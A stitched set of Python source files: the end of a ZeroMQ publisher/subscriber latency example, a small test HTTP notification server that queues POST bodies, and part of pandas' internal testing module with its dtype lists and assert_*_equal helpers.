if (time.time() - clock > MAX_ALLOWED_DELAY):
print("E: subscriber cannot keep up, aborting", file=sys.stderr)
break
# Work for 1 msec plus some random additional time
time.sleep(1e-3 * (1+2*random.random()))
pipe.send(b"gone and died")
# ---------------------------------------------------------------------
# This is our server task
# It publishes a time-stamped message to its pub socket every 1ms.
def publisher(pipe):
# Prepare publisher
ctx = zmq.Context.instance()
pub = ctx.socket(zmq.PUB)
pub.bind("tcp://*:5556")
while True:
# Send current clock (secs) to subscribers
pub.send(dumps(time.time()))
try:
signal = pipe.recv(zmq.DONTWAIT)
except zmq.ZMQError as e:
if e.errno == zmq.EAGAIN:
# nothing to recv
pass
else:
raise
else:
# received break message
break
time.sleep(1e-3) # 1msec wait
# This main thread simply starts a client, and a server, and then
# waits for the client to signal it's died.
def main():
ctx = zmq.Context.instance()
pub_pipe, pub_peer = zpipe(ctx)
sub_pipe, sub_peer = zpipe(ctx)
pub_thread = threading.Thread(target=publisher, args=(pub_peer,))
pub_thread.daemon=True
pub_thread.start()
sub_thread = threading.Thread(target=subscriber, args=(sub_peer,))
sub_thread.daemon=True
sub_thread.start()
# wait for sub to finish
sub_pipe.recv()
# tell pub to halt
pub_pipe.send(b"break")
time.sleep(0.1)
if __name__ == '__main__':
main()
|
notification.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import threading
import http.server
import queue
import json
from contextlib import contextmanager
from loguru import logger as LOG
class PostQueueRequestHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.queue = server.queue
self.error_queue = server.error_queue
self.checker = server.checker
super(PostQueueRequestHandler, self).__init__(request, client_address, server)
def do_POST(self):
self.send_response(201)
self.end_headers()
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
if callable(self.checker) and not self.checker(body):
LOG.error(f"Notification is not in expected format: {body}")
self.error_queue.put(body)
else:
self.queue.put(body)
def log_message(self, format, *args):
pass
class PostQueueServer(http.server.HTTPServer):
def __init__(self, server_address, RequestHandlerClass, checker=None):
assert (
RequestHandlerClass is PostQueueRequestHandler
), "Should be initialised with PostQueueRequestHandler"
self.queue = queue.Queue()
self.error_queue = queue.Queue()
self.checker = checker
super(PostQueueServer, self).__init__(server_address, PostQueueRequestHandler)
def get_queue(self):
return self.queue
def check_errors(self):
return self.error_queue.empty()
@contextmanager
def notification_server(server_info, checker=None):
host = None
port = []
if server_info is not None:
host, *port = server_info.split(":")
if not host or not (port and port[0]):
raise ValueError("Notification server host:port configuration is invalid")
else:
raise ValueError("Notification server host:port configuration is invalid")
with PostQueueServer(
(host, int(port[0])), PostQueueRequestHandler, checker
) as server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
LOG.success("Notification server started")
try:
yield server
finally:
assert (
server.check_errors() is True
), "Notification server caught malformed notifications"
server.shutdown()
server.server_close()
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(
lc, rc, obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
